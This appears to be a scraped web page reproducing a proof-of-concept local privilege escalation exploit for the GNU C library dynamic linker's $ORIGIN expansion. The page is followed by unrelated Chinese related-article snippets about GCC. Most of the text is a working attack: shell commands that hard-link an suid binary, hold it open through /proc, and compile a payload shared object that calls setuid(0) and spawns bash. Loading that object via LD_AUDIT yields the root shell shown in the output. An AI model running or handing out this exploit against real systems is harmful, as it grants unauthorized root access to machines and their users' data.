GNU C library dynamic linker $ORIGIN expansion Vulnerability

简介: # Create a directory in /tmp we can control. $ mkdir /tmp/exploit    # Li...
# Create a directory in /tmp we can control.
$ mkdir /tmp/exploit
  
# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target
  
# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3< /tmp/exploit/target
  
# This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*
  
# Remove the directory previously created
$ rm -rf /tmp/exploit/
  
# The /proc link should still exist, but now will be marked deleted.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
  
# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().
$ cat > payload.c
void __attribute__((constructor)) init()
{
   setuid(0);
   system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
  
# Now force the link in /proc to load $ORIGIN via LD_AUDIT.
$ LD_AUDIT="/$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)
目录
相关文章
|
C语言 Windows
开源项目推荐:GSL科学计算函数库(GNU Scientific Library),实现VS2019源码编译
开源项目推荐:GSL科学计算函数库(GNU Scientific Library),实现VS2019源码编译
1083 0
|
7月前
|
编译器 Linux 开发工具
|
4月前
|
前端开发 C语言
gcc动态库升级
gcc动态库升级
|
2月前
|
编译器 Linux C语言
gcc的编译过程
GCC(GNU Compiler Collection)的编译过程主要包括四个阶段:预处理、编译、汇编和链接。预处理展开宏定义,编译将代码转换为汇编语言,汇编生成目标文件,链接将目标文件与库文件合并成可执行文件。
92 11
|
4月前
|
编译器 开发工具 C语言
Gcc 链接文件
Gcc 链接文件
44 4
|
4月前
|
编译器 C语言 C++
MinGW安装gcc
MinGW安装gcc
106 0
|
6月前
|
自然语言处理 编译器 Go
GCC:GNU编译器
GCC:GNU编译器